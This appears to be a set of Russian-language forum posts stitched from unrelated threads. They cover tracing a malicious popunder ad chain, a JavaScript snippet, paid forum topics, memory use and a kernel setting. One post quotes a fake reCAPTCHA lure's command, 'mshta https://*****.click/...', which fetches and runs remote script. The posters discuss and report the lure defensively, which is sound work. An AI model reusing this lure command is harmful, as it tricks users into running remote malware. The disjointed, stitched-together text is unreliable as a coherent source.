И конечная точка другая? Я думаю, что первичная только меняется, а основной скрипт всегда на a.exdynsrv.com/popunder1000.js
webnames.ru
Подал жалобу на домен, посмотрим, что ответят. Возможно скажут: "Ой, не доказано, вопросы не к нам... мы тут не при чём."
А вот и распротранитель.
Далее цепочка: tofuturepubs.com
А потом http://a.exdynsrv.com/popunder1000.js
Как ты понял, что хочет ТС? 😲 😲 😲
опыт общения с заказчиками, вполне внятное ТЗ 😁
document.addEventListener("DOMContentLoaded", function(event) {
document.title=document.title+" SMILE";
});
Темы все стали платными на этом форуме, а если не заплатишь, что тему скрывают и никто её не видит.
Нашёл статью: Minimizing Malicious Script Execution
Там не только про mshta, но и про другие внутренние программки и как защититься от этого.
mshta https://*****.click/riii2-b.accdb # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
Дыру в IE используют. Забавно, что у меня отключён компонент IE, а mshta открывается IE в отдельном окне всё равно.
Хотя там даже не уязвимости, MSHTA там VB скрипты можно исполнять. Но да, это уже напоминает "молдавский вирус".
Тоже видел сегодня такую, редирект на какой-то площадке был.
Но не обратил внимание, что там писано было. Так, а что в буфер кидается, не сохранили?
Ну так надо выяснять причины, и почему 7 ГБ он пожирает и что делается.
Тут до изменения net.core.somaxconn далеко вообще.
